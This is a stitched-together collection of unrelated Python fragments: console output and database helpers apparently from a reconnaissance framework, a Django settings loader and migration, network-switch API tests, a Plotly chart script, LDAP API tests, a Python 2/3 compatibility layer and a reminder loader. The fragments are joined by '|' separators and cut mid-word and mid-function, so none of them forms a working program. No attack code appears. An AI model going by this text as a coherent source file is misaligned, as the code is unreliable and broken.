"""
if not isinstance(other, V1ResourceQuota):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
cla | ss CreateMapping(object):
def __init__(self):
self.request_id = ''
self.m | apping = '' |
len(header)))
for cmd in cmds:
self.stdout.write("%s %s\n" % (cmd.ljust(15), getattr(self, 'do_' + cmd).__doc__))
self.stdout.write("\n")
#==================================================
# SUPPORT METHODS
#==================================================
def to_unicode_str(self, obj, encoding='utf-8'):
# checks if obj is a string and converts if not
if not isinstance(obj, basestring):
obj = str(obj)
obj = self.to_unicode(obj, encoding)
return obj
def to_unicode(self, obj, encoding='utf-8'):
# checks if obj is a unicode string and converts if not
if isinstance(obj, basestring):
if not isinstance(obj, unicode):
obj = unicode(obj, encoding)
return obj
def is_hash(self, hashstr):
hashdict = [
{'pattern': '^[a-fA-F0-9]{32}$', 'type': 'MD5'},
{'pattern': '^[a-fA-F0-9]{16}$', 'type': 'MySQL'},
{'pattern': '^\*[a-fA-F0-9]{40}$', 'type': 'MySQL5'},
{'pattern': '^[a-fA-F0-9]{40}$', 'type': 'SHA1'},
{'pattern': '^[a-fA-F0-9]{56}$', 'type': 'SHA224'},
{'pattern': '^[a-fA-F0-9]{64}$', 'type': 'SHA256'},
{'pattern': '^[a-fA-F0-9]{96}$', 'type': 'SHA384'},
{'pattern': '^[a-fA-F0-9]{128}$', 'type': 'SHA512'},
{'pattern': '^\$[PH]{1}\$.{31}$', 'type': 'phpass'},
{'pattern': '^\$2[ya]?\$.{56}$', 'type': 'bcrypt'},
]
for hashitem in hashdict:
if re.match(hashitem['pattern'], hashstr):
return hashitem['type']
return False
def get_random_str(self, length):
return ''.join(random.choice(string.lowercase) for i in range(length))
def _is_writeable(self, filename):
try:
fp = open(filename, 'a')
fp.close()
return True
except IOError:
return False
def _parse_rowids(self, rowids):
xploded = []
rowids = [x.strip() for x in rowids.split(',')]
for rowid in rowids:
try:
if '-' in rowid:
start = int(rowid.split('-')[0].strip())
end = int(rowid.split('-')[-1].strip())
xploded += range(start, end+1)
else:
xploded.append(int(rowid))
except ValueError:
continue
return sorted(list(set(xploded)))
#==================================================
# OUTPUT METHODS
#==================================================
def print_exception(self, line=''):
if self._global_options['debug']:
print('%s%s' % (Colors.R, '-'*60))
traceback.print_exc()
print('%s%s' % ('-'*60, Colors.N))
line = ' '.join([x for x in [traceback.format_exc().strip().splitlines()[-1], line] if x])
self.error(line)
def error(self, line):
'''Formats and presents errors.'''
if not re.search('[.,;!?]$', line):
line += '.'
line = line[:1].upper() + line[1:]
print('%s[!] %s%s' % (Colors.R, self.to_unicode(line), Colors.N))
def output(self, line):
'''Formats and presents normal output.'''
print('%s[*]%s %s' % (Colors.B, Colors.N, self.to_unicode(line)))
def alert(self, line):
'''Formats and presents important output.'''
print('%s[*]%s %s' % (Colors.G, Colors.N, self.to_unicode(line)))
def verbose(self, line):
'''Formats and presents output if in verbose mode.'''
if self._global_options['verbose']:
self.output(line)
def debug(self, line):
'''Formats and presents output if in debug mode (very verbose).'''
if self._global_options['debug']:
self.output(line)
def heading(self, line, level=1):
'''Formats and presents styled header text'''
line = self.to_unicode(line)
print('')
if level == 0:
print(self.ruler*len(line))
print(line.upper())
print(self.ruler*len(line))
if level == 1:
print('%s%s' % (self.spacer, line.title()))
print('%s%s' % (self.spacer, self.ruler*len(line)))
def table(self, data, header=[], title=''):
'''Accepts a list of rows and outputs a table.'''
tdata = list(data)
if header:
tdata.insert(0, header)
if len(set([len(x) for x in tdata])) > 1:
raise FrameworkException('Row lengths not consistent.')
lens = []
cols = len(tdata[0])
# create a list of max widths for each column
for i in range(0,cols):
lens.append(len(max([self.to_unicode_str(x[i]) if x[i] != None else '' for x in tdata], key=len)))
# calculate dynamic widths based on the title
title_len = len(title)
tdata_len = sum(lens) + (3*(cols-1))
diff = title_len - tdata_len
if diff > 0:
diff_per = diff / cols
lens = [x+diff_per for x in lens]
diff_mod = diff % cols
for x in range(0, diff_mod):
lens[x] += 1
# build ascii table
if len(tdata) > 0:
separator_str = '%s+-%s%%s-+' % (self.spacer, '%s---'*(cols-1))
separator_sub = tuple(['-'*x for x in lens])
separator = separator_str % separator_sub
data_str = '%s| %s%%s |' % (self.spacer, '%s | '*(cols-1))
# top of ascii table
print('')
print(separator)
# ascii table data
if title:
print('%s| %s |' % (self.spacer, title.center(tdata_len)))
print(separator)
if header:
rdata = tdata.pop(0)
data_sub = tuple([rdata[i].center(lens[i]) for i in range(0,cols)])
print(data_str % data_sub)
print(separator)
for rdata in tdata:
data_sub = tuple([self.to_unicode_str(rdata[i]).ljust(lens[i]) if rdata[i] != None else ''.ljust(lens[i]) for i in range(0,cols)])
print(data_str % data_sub)
# bottom of ascii table
print(separator)
print('')
#==================================================
# DATABASE METHODS
#==================================================
def query(self, query, values=(), p | ath=''):
'''Queries the database and returns the results as a list.'''
if not path:
path = os.path.join(self.workspace, 'data.db')
self.debug('DATABASE => %s' % (path))
self.debug('QUERY => %s' % (query))
with sqlite3.connect(path) as conn:
with closing(conn.cursor()) as cur:
if values:
self.debug('VALUES => %s' % (repr(values)))
| cur.execute(query, values)
else:
cur.execute(query)
# a rowcount of -1 typically refers to a select statement
if cur.rowcount == -1:
rows = cur.fetchall()
results = rows
# a rowcount of 1 == success and 0 == failure
else:
conn.commit()
results = cur.rowcount
return results
def get_columns(self, table):
return [(x[1],x[2]) for x in self.query('PRAGMA table_info(\'%s\')' % (table))]
def get_tables(self):
return [x[0] for x in self.query('SELECT name FROM sqlite_master WHERE type=\'table\'') if x[0] not in ['dashboard']]
#==================================================
# ADD METHODS
#==================================================
def add_netblocks(self, netblock=None):
'''Adds a netblock to the database and returns the affected row count.'''
data = dict(
netblock = self.to_unicode(netblock)
)
return self.insert('netblocks', data, data.keys())
def add_ports(self, ip_address=None, host=None, port=None, protocol=None):
|
n
import filelock
import tempfile
import logging
import warnings
import multiprocessing
from django.core.exceptions import ImproperlyConfigured
from django.utils.functional import LazyObject, empty
from biohub.utils.collections import unique
from biohub.utils.module import is_valid_module_path
logger = logging.getLogger('biohub.conf')
CONFIG_ENVIRON = 'BIOHUB_CONFIG_PATH'
LOCK_FILE_PATH = os.path.join(tempfile.gettempdir(), 'biohub.config.lock')
# Field mapping for biohub settings
# Format: dest_name -> (org_name, default)
mapping = {
'DEFAULT_DATABASE': ('DATABASE', dict),
'BIOHUB_PLUGINS': ('PLUGINS', list),
'TIMEZONE': ('TIMEZONE', 'UTC'),
'UPLOAD_DIR': ('UPLOAD_DIR', lambda: os.path.join(tempfile.gettempdir(), 'biohub')),
'REDIS_URI': ('REDIS_URI', ''),
'SECRET_KEY': ('SECRET_KEY', ''),
'BIOHUB_MAX_TASKS': ('MAX_TASKS', lambda: multiprocessing.cpu_count() * 5),
'BIOHUB_TASK_MAX_TIMEOUT': ('TASK_MAX_TIMEOUT', 180),
'EMAIL': ('EMAIL', dict),
'CORS': ('CORS', list),
'ES_URL': ('ES_URL', 'http://127.0.0.1:9200/'),
'THROTTLE': ('THROTTLE', lambda: {
'rate': 15,
'experience': 86400,
'post': 15,
'vote': 15,
'register': 3600
}),
'PLUGINS_DIR': ('PLUGINS_DIR', lambda: os.path.join(tempfile.gettempdir(), 'biohub_plugins'))
}
valid_settings_keys = tuple(mapping.values())
class BiohubSettingsWarning(RuntimeWarning):
pass
class Settings(object):
"""
The core settings class, which can validate, store, serialize/deserialze
biohub relevant configuration items.
"""
def _validate(self, key, value, default):
"""
A proxy function for validation, which will find `validate_<key>`
method in self and feed `value` to it if the method exists. The
validation methods should return the validated value.
"""
validate_func = getattr(
self, 'validate_%s' % key.lower(), None)
if validate_func is not None:
value = validate_func(value, default)
return value
def _set_settings_values(self, source=None):
"""
Validate and store configuration items specified by `source` (a dict).
If source is `None`, the function will use default values to fill up
unset configuration items.
"""
if source is None:
for dest_name, (org_name, default_value) in mapping.items():
if not hasattr(self, dest_name):
value = default_value() if callable(default_value) \
else default_value
setattr(self, dest_name, value)
return
for dest_name, (org_name, default_value) in mapping.items():
value = source.get(org_name, None)
if value is None:
value = default_value() if callable(default_value) \
| else default_value
value = self._validate(dest_name, value, default_value)
setattr(self, dest_name, value)
def dump_settings_value(self):
"""
Return a dict containing gathered configuration items.
"""
result = {}
for dest_name, (org_name, _) in mapping.items():
| value = getattr(self, dest_name)
value = self._validate(dest_name, value, _)
result[org_name] = value
return result
def validate_biohub_plugins(self, value, default):
"""
BIOHUB_PLUGINS should not contains duplicated items.
"""
result = []
for item in unique(value):
if not is_valid_module_path(item, try_import=True):
warnings.warn(
"Module '%s' not found. Skipped." % item,
BiohubSettingsWarning
)
else:
result.append(item)
return result
def validate_redis_uri(self, value, default):
if not value:
warnings.warn(
'No redis configuration provided, redis-based services '
'will be disabled.', BiohubSettingsWarning)
return value
def validate_secret_key(self, value, default):
if not value:
warnings.warn(
'No secret key provided, default value used instead.',
BiohubSettingsWarning)
return value
def validate_biohub_max_tasks(self, value, default):
assert isinstance(value, int) and value > 0, \
"'MAX_TASKS' should be positive integer."
return value
def validate_biohub_task_max_timeout(self, value, default):
assert isinstance(value, (int, float)) and value > 0, \
"'TASK_MAX_TIMEOUT' should be positive float."
return value
def validate_upload_dir(self, value, default):
if value.startswith(tempfile.gettempdir()):
warnings.warn(
'Your UPLOAD_DIR is within the temporary directory. All '
'files will be erased once system reboots.',
BiohubSettingsWarning)
return os.path.abspath(value)
def validate_plugins_dir(self, value, default):
if value.startswith(tempfile.gettempdir()):
warnings.warn(
'Your PLUGINS_DIR is within the temporary directory. All '
'files will be erased once system reboots.',
BiohubSettingsWarning)
try:
os.makedirs(value)
except OSError:
pass
sys.path.append(value)
return os.path.abspath(value)
def validate_email(self, value, default):
if not isinstance(value, dict):
raise TypeError("'EMAIL' should be a dict, got type %r." % type(type(value)))
required = 'HOST HOST_USER HOST_PASSWORD PORT'.split()
missing = set(required) - set(value)
if missing:
warnings.warn(
'Fields %s not found in EMAIL, which may affect email related services.'
% ', '.join(missing), BiohubSettingsWarning)
for field in missing:
value[field] = ''
return value
def validate_throttle(self, value, default):
if not isinstance(value, dict):
raise TypeError("'THROTTLE' should be a dict, got type %r." % type(type(value)))
default_value = default()
default_value.update(value)
return default_value
def __delattr__(self, name):
"""
Configuration items should be protected.
"""
if name in valid_settings_keys:
raise KeyError(
"Can't delete a configuration item.")
super(Settings, self).__delattr__(name)
class LazySettings(LazyObject):
"""
A proxy to settings object. Settings will not be loaded until it is
accessed.
"""
def __init__(self):
self._manager = SettingsManager(Settings())
super(LazySettings, self).__init__()
@property
def configured(self):
"""
Returns a boolean indicating whether the settings is loaded.
"""
return self._wrapped is not empty
def _setup(self):
self._wrapped = self._manager._settings_object
self._manager.load()
def __getattr__(self, name):
if self._wrapped is empty:
self._setup()
val = getattr(self._manager, name, None)
if val is None:
val = getattr(self._wrapped, name)
return val
def __setattr__(self, name, value):
if name == '_manager':
self.__dict__['_manager'] = value
return
self.__dict__.pop(name, None)
super(LazySettings, self).__setattr__(name, value)
def __delattr__(self, name):
raise AttributeError('Not allowed to remove a settings attribute.')
class SettingsManager(object):
def __init__(self, settings_object):
self._settings_object = settings_object
self._file_lock = filelock.FileLock(LOCK_FILE_PATH)
self._store_settings = []
@property
def locking(self):
return self._file_lock.is_locke |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('artist', '0002_auto_20150322_1630'),
]
operations = [
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(verbose_name | ='ID', serialize=False, auto_created=True, primary_key=True)),
('location', models.CharField(max_length=500, verbose_name='Location')),
('date_tim | e', models.DateTimeField(verbose_name='Date & Time')),
('artist', models.ForeignKey(to='artist.Artist')),
],
options={
},
bases=(models.Model,),
),
]
|
# -*- | coding: utf-8 -*-
"""template tags | """ |
# encoding: u | tf8 | |
rs may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL ARISTA NETWORKS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import unittest
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../lib'))
from testlib import random_string
from systestlib import DutSystemTest
class TestApiSystem(DutSystemTest):
def test_get(self):
for dut in self.duts:
dut.config('default hostname')
resp = dut.api('system').get()
keys = ['hostname', 'iprouting', 'banner_motd', 'banner_login']
self.assertEqual(sorted(keys), sorted(resp.keys()))
def test_get_with_period(self):
for dut in self.duts:
dut.config('hostname host.domain.net')
response = dut.api('system').get()
self.assertEqual(response['hostname'], 'host.domain.net')
def test_get_check_hostname(self):
for dut in self.duts:
dut.config('hostname teststring')
response = dut.api('system').get()
self.assertEqual(response['hostname'], 'teststring')
def test_get_check_banners(self):
for dut in self.duts:
motd_banner_value = random_string() + "\n"
login_banner_value = random_string() + "\n"
dut.config([dict(cmd="banner motd", input=motd_banner_value)])
dut.config([dict(cmd="banner login", input=login_banner_value)])
resp = dut.api('system').get()
self.assertEqual(resp['banner_login'], login_banner_value.rstrip())
self.assertEqual(resp['banner_motd'], motd_banner_value.rstrip())
def test_get_banner_with_EOF(self):
for dut in self.duts:
motd_banner_value = '!!!newlinebaner\nSecondLIneEOF!!!newlinebanner\n'
dut.config([dict(cmd="banner motd", input=motd_banner_value)])
resp = dut.api('system').get()
self.assertEqual(resp['banner_motd'], motd_banner_value.rstrip())
def test_set_hostname_with_value(self):
for dut in self.duts:
dut.config('default hostname')
value = random_string()
response = dut.api('system').set_hostname(value)
self.assertTrue(response, 'dut=%s' % dut)
value = 'hostname %s' % value
self.assertIn(value, dut.running_config)
def test_set_hostname_with_no_value(self):
for dut in self.duts:
dut.config('hostname test')
response = dut.api('system').set_hostname(disable=True)
self.assertTrue(response, 'dut=%s' % dut)
value = 'no hostname'
self.assertIn(value, dut.running_config)
def test_set_hostname_with_default(self):
for dut in self.duts:
dut.config('hostname test')
response = dut.api('system').set_hostname(default=True)
self.assertTrue(response, 'dut=%s' % dut)
value = 'no hostname'
self.assertIn(value, dut.running_config)
def test_set_hostname_default_over_value(self):
for dut in self.duts:
dut.config('hostname test')
response = dut.api('system').set_hostname(value='foo', default=True)
self.assertTrue(response, 'dut=%s' % dut)
value = 'no hostname'
self.assertIn(value, dut.running_config)
def test_set_iprouting_to_true(self):
for dut in self.duts:
dut.config('no ip routing')
resp = dut.api('system').set_iprouting(True)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertNotIn('no ip rotuing', dut.running_config)
def test_set_iprouting_to_false(self):
for dut in self.duts:
dut.config('ip routing')
resp = dut.api('system').set_iprouting(False)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertIn('no ip routing', dut.running_config)
def test_set_iprouting_to_no(self):
for dut in self.duts:
dut.config('ip routing')
resp = dut.api('system').set_iprouting(disable=True)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertIn('no ip routing', dut.running_config)
def test_set_iprouting_to_default(self):
for dut in self.duts:
dut.config('ip routing')
resp = dut.api('system').set_iprouting(default=True)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertIn('no ip routing', dut.running_config)
def test_set_hostname_with_period(self):
for dut in self.duts:
dut.config('hostname localhost')
response = dut.api('system').set_hostname(value='host.domain.net')
self.assertTrue(response, 'dut=%s' % dut)
value = 'hostname host.domain.net'
self.assertIn(value, dut.running_config)
def test_set_banner_motd(self):
for dut in self.duts:
banner_value = random_string()
dut.config([dict(cmd="banner motd",
input=banner_value)])
self.assertIn(banner_value, dut.running_config)
banner_api_value = random_string()
resp = dut.api('system').set_banner("motd", banner_api_value)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertIn(banner_api_value, dut.running_config)
def test_set_banner_motd_donkey(self):
for dut in self.duts:
donkey_chicken = r"""
/\ /\
( \\ // )
\ \\ // /
\_\\||||//_/
\/ _ _ \
\/|(o)(O)|
\/ | |
___________________\/ \ /
// // |____| Cluck cluck cluck!
// || / \
//| \| \ 0 0 /
// \ ) V / \____/
// \ / ( /
"" \ /_________| |_/
/ /\ / | ||
/ / / / \ ||
| | | | | ||
| | | | | ||
|_| |_| |_||
\_\ \_\ \_\\
"""
resp = dut.api('system').set_banner("motd", donkey_chicken)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertIn(donkey_chicken, dut.running_config)
def test_set_banner_motd_default(self):
for dut in self.duts:
dut.config([dict(cmd="banner motd",
input="!!!!REMOVE BANNER TEST!!!!")])
dut.api('system').set_banner('motd', None, True)
self.assertIn('no banner motd', dut.running_config)
def test_set_banner_login(self):
for dut in self.duts:
banner_value = random_string( | )
dut.config([dict(cmd="banner login",
input=banner_value)])
self.assertIn(banner_value, dut.running_config)
banner_api_value = random_string()
resp = dut.api('system').set_banner("login", banner_api_value)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertIn(banner_api_value, dut.running_config)
config_login_banner = dut.api('system') | .get()['banner_login']
sel |
"""Import Module Plotly To Ploting Graph"""
import plotly.plotly as py
import plotly.graph_objs as go
"""Open and Read CSV from database"""
data = open('Real_Final_database_02.csv')
alldata = data.readlines()
listdata = []
for i in alldata:
listdata.append(i.strip().split(','))
type_z = ['Flood', 'Epidemic', 'Drought', 'Earthquake', 'Storm']
size = [22, 19, 10, 7, 5]
fill_colors = ['#00d0f5', '#ff4a2e', 'a36800', '#ad9900', '#8b00db']
trace = []
"""Select and Set variable Data affect that happen in each disaster in Myanmar"""
for i in range(5):
year_x = []
death_z = []
types_y = []
for j in listdat | a:
if j[0] == 'Myanmar' and j[2] == type_z[i]:
year_x.append(int(j[1]))
death_z.append(int(j[5]))
types_y.append(type_z[i])
trace.append(go.Scatter(x = year_x, y = death_z, name = type_z[i],
line = dict(color = fill_colors[i], width = 2),
marker=dict(symbol = 'circle',
| sizemode = 'diameter',
sizeref = 0.85,
size = size[i],
line = dict(width = 2))))
data = trace
"""Part of code that adjust layout of graph"""
layout = go.Layout(title = 'Total Damage',
yaxis = dict(title = 'Total Damage',
titlefont = dict(color = '#ff2323'),
tickfont = dict(color = '#ff2323')),
paper_bgcolor = 'rgb(245, 245, 245)',
plot_bgcolor = 'rgb(245, 245, 245)')
"""Part of plot graph in plotly"""
fig = go.Figure(data=data, layout=layout)
plot_url = py.plot(fig, filename='Total_Death_in_Myanmar') |
import json
import mock
from django.test import TestCase
from django.core.urlresolvers import reverse
class TestAPI(TestCase):
@mock.patch('ldap.initialize')
def test_exists(self, mocked_initialize):
connection = mock.MagicMock()
mocked_initialize.return_value = connection
url = reverse('api:exists')
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
# check that 400 Bad Request errors are proper JSON
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(
json.loads(response.content),
{'error': "missing key 'mail'"}
)
response = self.client.get(url, {'mail': ''})
self.assertEqual(response.status_code, 400)
result = {
'abc123': {'uid': 'abc123', 'mail': 'peter@example.com'},
}
def search_s(base, scope, filterstr, *args, **kwargs):
if 'peter@example.com' in filterstr:
# if 'hgaccountenabled=TRUE' in filterstr:
# return []
return result.items()
return []
connection.search_s.side_effect = search_s
response = self.client.get(url, {'mail': 'peter@example.com'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(json.loads(response.content), True)
response = self.client.get(url, {'mail': 'never@heard.of.com'})
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), False)
# response = self.client.get(url, {'mail': 'peter@example.com',
# 'hgaccountenabled': ''})
# self.assertEqual(response.status_code, 200)
# self.assertEqual(json.loads(response.content), False)
response = self.client.get(url, {'mail': 'peter@example.com',
'gender': 'male'})
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), True)
@mock.patch('ldap.initialize')
def test_employee(self, mocked_initialize):
connection = mock.MagicMock()
mocked_initialize.return_value = connection
url = reverse('api:employee')
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
response = self.client.get(url, {'mail': ''})
self.assertEqual(response.status_code, 400)
result = {
'abc123': {'uid': 'abc123',
'mail': 'peter@mozilla.com',
'sn': u'B\xe3ngtsson'},
}
def search_s(base, scope, filterstr, *args, **kwargs):
if 'peter@example.com' in filterstr:
return result.items()
return []
connection.search_s.side_effect = search_s
response = self.client.get(url, {'mail': 'peter@example.com'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(json.loads(response.content), True)
response = self.client.get(url, {'mail': 'never@heard.of.com'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(json.loads(response.content), False)
@mock.patch('ldap.initialize')
def test_ingroup(self, mocked_initialize):
connection = mock.MagicMock()
mocked_initialize.return_value = connection
url = reverse('api:in-group')
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
response = self.client.get(url, {'mail': ''})
self.assertEqual(response.status_code, 400)
response = self.client.get(url, {'mail': 'peter@example.com'})
self.assertEqual(response.status_code, 400)
| response = self.client.get(url, {'mail': 'peter@example.com',
'cn': ''})
self.assertEqual(response.status_code, 400)
result = {
'abc123': {'uid': 'abc123', 'mail': 'peter@example.com'},
}
def search_s(base, scope, filterstr, *args, **kwargs):
if 'ou=groups' in base:
if (
'peter@example.com' in filterstr and
'cn=Cras | hStats' in filterstr
):
return result.items()
else:
# basic lookup
if 'peter@example.com' in filterstr:
return result.items()
return []
connection.search_s.side_effect = search_s
response = self.client.get(url, {'mail': 'not@head.of.com',
'cn': 'CrashStats'})
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), False)
response = self.client.get(url, {'mail': 'peter@example.com',
'cn': 'CrashStats'})
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), True)
response = self.client.get(url, {'mail': 'peter@example.com',
'cn': 'NotInGroup'})
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), False)
|
3: OLD_UNICODE = None
else: OLD_UNICODE = unicode #@UndefinedVariable
if PYTHON_3: STRINGS = (str,)
else: STRINGS = (str, unicode) #@UndefinedVariable
if PYTHON_3: ALL_STRINGS = (bytes, str)
else: ALL_STRINGS = (bytes, str, unicode) #@UndefinedVariable
if PYTHON_3: INTEGERS = (int,)
else: INTEGERS = (int, long) #@UndefinedVariable
# saves a series of global symbols that are going to be
# used latter for some of the legacy operations
_ord = ord
_chr = chr
_str = str
_bytes = bytes
_range = range
try: _xrange = xrange #@UndefinedVariable
except Exception: _xrange = None
if PYTHON_3: Request = urllib.request.Request
else: Request = urllib2.Request
if PYTHON_3: HTTPHandler = urllib.request.HTTPHandler
else: HTTPHandler = urllib2.HTTPHandler
if PYTHON_3: HTTPError = urllib.error.HTTPError
else: HTTPError = urllib2.HTTPError
if PYTHON_3: HTTPConnection = http.client.HTTPConnection #@UndefinedVariable
else: HTTPConnection = httplib.HTTPConnection
if PYTHON_3: HTTPSConnection = http.client.HTTPSConnection #@UndefinedVariable
else: HTTPSConnection = httplib.HTTPSConnection
try: _execfile = execfile #@UndefinedVariable
except Exception: _execfile = None
try: _reduce = reduce #@UndefinedVariable
except Exception: _reduce = None
try: _reload = reload #@UndefinedVariable
except Exception: _reload = None
try: _unichr = unichr #@UndefinedVariable
except Exception: _unichr = None
def with_meta(meta, *bases):
return meta("Class", bases, {})
def eager(iterable):
if PYTHON_3: return list(iterable)
return iterable
def iteritems(associative):
if PYTHON_3: return associative.items()
return associative.iteritems()
def iterkeys(associative):
if PYTHON_3: return associative.keys()
return associative.iterkeys()
def itervalues(associative):
if PYTHON_3: return associative.values()
return associative.itervalues()
def items(associative):
if PYTHON_3: return eager(associative.items())
return associative.items()
def keys(associative):
if PYTHON_3: return eager(associative.keys())
return associative.keys()
def values(associative):
if PYTHON_3: return eager(associative.values())
return associative.values()
def xrange(start, stop = None, step = 1):
if PYTHON_3: return _range(start, stop, step) if stop else _range(start)
return _xrange(start, stop, step) if stop else _range(start)
def range(start, stop = None, step = None):
if PYTHON_3: return eager(_range(start, stop, step)) if stop else eager(_range(start))
return _range(start, stop, step) if stop else _range(start)
def ord(value):
if PYTHON_3 and type(value) == int: return value
return _ord(value)
def chr(value):
if PYTHON_3: return _bytes([value])
if type(value) in INTEGERS: return _chr(value)
return value
def chri(value):
if PYTHON_3: return value
if type(value) in INTEGERS: return _chr(value)
return value
def bytes(value, encoding = "latin-1", errors = "strict", force = False):
if not PYTHON_3 and not force: return value
if value == None: return value
if type(value) == _bytes: return value
return value.encode(encoding, errors)
def str(value, encoding = "latin-1", errors = "strict", force = False):
if not PYTHON_3 and not force: return value
if value == None: return value
if type(value) in STRINGS: return value
return value.decode(encoding, errors)
def u(value, encoding = "utf-8", errors = "strict", force = False):
if PYTHON_3 and not force: return value
if value == None: return value
if type(value) == UNICODE: return value
return value.decode(encoding, errors)
def ascii(value, encoding = "utf-8", errors = "replace"):
if is_bytes(value): value = value.decode(encoding, errors)
else: value = UNICODE(value)
value = value.encode("ascii", errors)
value = str(value)
return value
def orderable(value):
if not PYTHON_3: return value
return Orderable(value)
def is_str(value):
return type(value) == _str
def is_unicode(value):
if PYTHON_3: return type(value) == _str
else: return type(value) == unicode #@UndefinedVariable
def is_bytes(value):
if PYTHON_3: return type(value) == _bytes
else: return type(value) == _str #@UndefinedVariable
def is_string(value, all = False):
target = ALL_STRINGS if all else STRINGS
return type(value) in target
def is_generator(value):
if inspect.isgenerator(value): return True
if type(value) in (itertools.chain,): return True
if hasattr(value, "_is_generator"): return True
return False
def is_async_generator(value):
if not hasattr(inspect, "isasyncgen"): return False
return inspect.isasyncgen(value)
def is_unittest(name = "unittest"):
current_stack = inspect.stack()
for stack_frame in current_stack:
for program_line in stack_frame[4]:
is_unittest = not name in program_line
if is_unittest: continue
return True
return False
def execfile(path, global_vars, local_vars = None, encoding = "utf-8"):
if local_vars == None: local_vars = global_vars
if not PYTHON_3: return _execfile(path, global_vars, local_vars)
file = open(path, "rb")
try: data = file.read()
finally: file.close()
data = data.decode(encoding)
code = compile(data, path, "exec")
exec(code, global_vars, local_vars) #@UndefinedVariable
def walk(path, visit, arg):
for root, dirs, _files in os.walk(path):
names = os.listdir(root)
visit(arg, root, names)
for dir in list(dirs):
exists = dir in names
not exists and dirs.remove(dir)
def getargspec(func):
has_full = hasattr(inspect, "getfullargspec")
if has_full: return ArgSpec(*inspect.getfullargspec(func)[:4])
else: return inspect.getargspec(func)
def reduce(*args, **kwargs):
if PYTHON_3: return functools.reduce(*args, **kwargs)
return _reduce(*args, **kwargs)
def reload(*args, **kwargs):
if PYTHON_3: return imp.reload(*args, **kwargs)
return _reload(*args, **kwargs)
def unichr(*args, **kwargs):
if PYTHON_3: return _chr(*args, **kwargs)
return _unichr(*args, **kwargs)
def urlopen(*args, **kwargs):
if PYTHON_3: return urllib.request.urlopen(*args, **kwargs)
else: return urllib2.urlopen(*args, **kwargs) #@UndefinedVariable
def build_opener(*args, **kwargs):
if PYTHON_3: return urllib.request.build_opener(*args, **kwargs)
else: return urllib2.build_opener(*args, **kwargs) #@UndefinedVariable
def urlparse(*args, **kwargs):
return _urlparse.urlparse(*args, **kwargs)
def urlunparse(*args, **kwargs):
return _urlparse.urlunparse(*args, **kwargs)
def parse_qs(*args, **kwargs):
return _urlparse.parse_qs(*args, **kwargs)
def urlencode(*args, **kwargs):
if PYTHON_3: return urllib.parse.urlencode(*args, **kwargs)
else: return urllib.urlencode(*args, **kwargs) #@UndefinedVariable
def quote(*args, **kwargs):
if PYTHON_3: return urllib.parse.quote(*args, **kwargs)
else: return urllib.quote(*args, **kwargs) #@UndefinedVariable
def quote_plus(*args, **kwargs):
if PYTHON_3: return urllib.parse.quote_plus(*args, **kwargs)
else: return urllib.quote_plus(*args, **kwargs) #@UndefinedVariable
def unquote(*args, **kwargs):
if PYTHON_3: return urllib.parse.unquote(*args, **kwargs)
else: return urllib.unquote(*args, **kwargs) #@UndefinedVariable
def unquote_plus(*args, **kwargs):
| if PYTHON_3: return urllib.parse.unquote_plus(*args, **kwargs)
else: return urllib.unquot | e_plus(*args, **kwargs) #@UndefinedVariable
def cmp_to_key(*args, **kwargs):
if PYTHON_3: return dict(key = functools.cmp_to_key(*args, **kwargs)) #@UndefinedVariable
else: return dict(cmp = args[0])
def tobytes(self, *args, **kwargs):
if PYTHON_3: return self.tobytes(*args, **kwargs)
else: return self.tostring(*args, **kwargs)
def tostring(self, *args, **kwargs):
|
# -*- coding: utf-8 | -*-
"""Functional tes | ts using WebTest.
See: http://webtest.readthedocs.org/
"""
|
import json
import time
import sched
from api import send_message
scheduler = sched.scheduler(time.time, time.sleep)
def load_reminders():
reminders = {}
try:
with open("data/reminders.json") as fp:
reminders = json.load(fp)
except Exception:
with open("data/reminders.json", "w") as fp:
json.dump(reminders, fp, indent=4)
return reminders
def save_reminders(reminders):
with open("data/reminders.json", "w") as fp:
json.dump(reminders, fp, indent=4)
def list_reminders(chat):
